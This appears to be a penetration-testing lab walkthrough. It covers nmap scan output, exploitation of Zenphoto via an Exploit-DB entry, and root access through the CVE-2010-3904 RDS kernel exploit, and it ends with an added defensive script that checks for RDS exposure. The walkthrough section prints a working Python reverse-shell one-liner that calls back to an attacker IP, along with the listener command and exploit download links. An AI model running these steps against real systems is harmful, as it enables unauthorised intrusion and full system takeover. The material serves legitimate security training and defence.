Nmap
──(kali㉿kali)-[/home/Tools/nmapAutomator/192.168.243.41]
└─$ cat nmapAutomator_192.168.243.41_all.txt
Running all scans on 192.168.243.41
Host is likely running Unknown OS!
---------------------Starting Port Scan-----------------------
PORT STATE SERVICE
22/tcp open ssh
23/tcp open telnet
80/tcp open http
3306/tcp open mysql
---------------------Starting Script Scan-----------------------
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 8392abf2b76e27087ba9b872328ccc29 (DSA)
|_ 2048 6577fa50fd4d9ef167e5cc0cc696f23e (RSA)
23/tcp open ipp CUPS 1.4
|_http-server-header: CUPS/1.4
| http-methods:
|_ Potentially risky methods: PUT
|_http-title: 403 Forbidden
80/tcp open http Apache httpd 2.2.14 ((Ubuntu))
|_http-server-header: Apache/2.2.14 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
3306/tcp open mysql MySQL (unauthorized)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS Detection modified to: Linux
---------------------Starting Full Scan------------------------
PORT STATE SERVICE
22/tcp open ssh
23/tcp open telnet
80/tcp open http
3306/tcp open mysql
No new ports
----------------------Starting UDP Scan------------------------
PORT STATE SERVICE
5353/udp open zeroconf
Making a script scan on UDP ports: 5353
PORT STATE SERVICE VERSION
5353/udp open mdns DNS-based service discovery
Http
Given the open ports and the service versions running on them, I am going to jump straight into port 80.
The site on port 80 is running zenphoto.
Exploitation
Searching Exploit-DB for “zenphoto 1.4.1.4” turns up:
https://www.exploit-db.com/exploits/18083
The shell you get from that exploit is unstable, so use a Python one-liner to call back with a more stable reverse shell:
export RHOST="192.168.45.227";export RPORT=443;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
Listener on the attacking machine:
rlwrap nc -lvnp 443
Privilege Escalation
Then download linpeas.sh to the target machine and run it. In its output it reports:
[+] [CVE-2010-3904] rds
Details: http://www.securityfocus.com/archive/1/514379
Exposure: highly probable
Tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},ubuntu=10.10|9.10,fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},[ ubuntu=10.04{kernel:2.6.32-(21|24)-generic} ]
Download URL: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c
https://www.exploit-db.com/exploits/15285
I then executed the exploit and was able to gain a root shell.
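A defender-side check for the RDS finding above, added here as an example and not taken from the write-up or from the tools it mentions: it tests a kernel release string against the vulnerable range (upstream 2.6.30 through 2.6.35, fixed in 2.6.36, which is slightly wider than the distro tags quoted above), checks /proc/modules, and looks for the "install rds /bin/true" modprobe rule that the vendor advisories for CVE-2010-3904 recommended. Assumed: a Linux host with modprobe drop-ins under /etc/modprobe.d/*.conf.

```shell
#!/bin/sh
# Added example, not part of the original write-up: a defender-side check for
# the CVE-2010-3904 (RDS) finding that the exploit suggester reported above.
# Upstream the bug affects kernels 2.6.30 through 2.6.35 (fixed in 2.6.36);
# the tags in the finding cover the distro builds of 2.6.31 to 2.6.35.
# Assumptions: a Linux host, modprobe drop-ins under /etc/modprobe.d/*.conf.

# Return 0 if the kernel release string (as printed by `uname -r`) falls in
# the vulnerable upstream range, e.g. "2.6.32-24-generic" from the tag above.
kernel_in_rds_range() {
    v=${1%%-*}                       # drop the distro suffix: 2.6.32-24-generic -> 2.6.32
    maj=${v%%.*}; rest=${v#*.}       # 2 / 6.32
    min=${rest%%.*}; rest=${rest#*.} # 6 / 32
    pat=${rest%%.*}                  # 32 (ignores a fourth component such as 2.6.35.4)
    [ "$maj" -eq 2 ] && [ "$min" -eq 6 ] && [ "$pat" -ge 30 ] && [ "$pat" -le 35 ]
}

# Return 0 if the modprobe configuration read from stdin neutralises rds.
# The documented mitigation is "install rds /bin/true": modprobe then runs
# /bin/true instead of loading the module. A bare "blacklist rds" is not the
# documented mitigation, because blacklist only affects alias resolution and
# the module can still be loaded by name, so only the install rule counts here.
modprobe_disables_rds() {
    grep -Eq '^[[:space:]]*install[[:space:]]+rds[[:space:]]+/bin/(true|false)'
}

# Return 0 if the rds module is loaded, given /proc/modules text on stdin.
rds_loaded() {
    grep -Eq '^rds[[:space:]]'
}

# Live check against the running host. Exit 0 = not affected or mitigated,
# exit 1 = action needed. Prints the reason either way.
check_host() {
    k=$(uname -r)
    if ! kernel_in_rds_range "$k"; then
        echo "kernel $k is outside the vulnerable RDS range"; return 0
    fi
    if rds_loaded < /proc/modules; then
        echo "rds is loaded on vulnerable kernel $k: rmmod rds, then disable it"; return 1
    fi
    if cat /etc/modprobe.d/*.conf 2>/dev/null | modprobe_disables_rds; then
        echo "kernel $k is in range but rds is disabled via an install rule"; return 0
    fi
    echo "kernel $k is in range and rds can still be loaded: add 'install rds /bin/true'" \
         "to /etc/modprobe.d/ and apply the kernel update"; return 1
}

if [ "${1:-}" = "--check" ]; then check_host; fi
```

Run it with `--check` on the host being audited; the three helper functions take their input as arguments or on stdin so they can also be run against collected evidence offline.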